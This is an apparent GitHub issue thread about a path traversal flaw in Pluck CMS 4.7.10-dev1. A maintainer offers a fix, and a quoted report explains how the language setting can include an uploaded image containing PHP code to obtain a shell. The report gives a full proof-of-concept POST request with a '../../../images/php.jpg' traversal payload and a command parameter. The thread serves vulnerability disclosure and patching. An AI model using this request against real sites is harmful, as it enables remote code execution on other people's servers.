BSteelooper
commented
5 years ago I have created a quick fix for this issue. mod_security will prevent this exploit because of the "Path Traversal Attack".
Could you verify the fix? I drafted a new pre-release. pluck-4.7.10-dev2.tar.gz
admin.php:
language.php:
save_file():
"../../../images/wphp.jpg" Be written to \data\settings\langpref.php
Users can upload a picture file containing malicious code to getshell.
POST /pluck-4.7.10-dev1/admin.php?action=language HTTP/1.1 Host: 127.0.0.1:83 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1:83/pluck-4.7.10-dev1/admin.php?action=language Cookie: LQUKaS_admin_username=admin; Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1570503836; PHPSESSID=a0bhen6shpeifgc20p0l23pmj1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 70
cont1=../../../images/php.jpg&save=%E5%82%A8%E5%AD%98&cmd=echo "2333";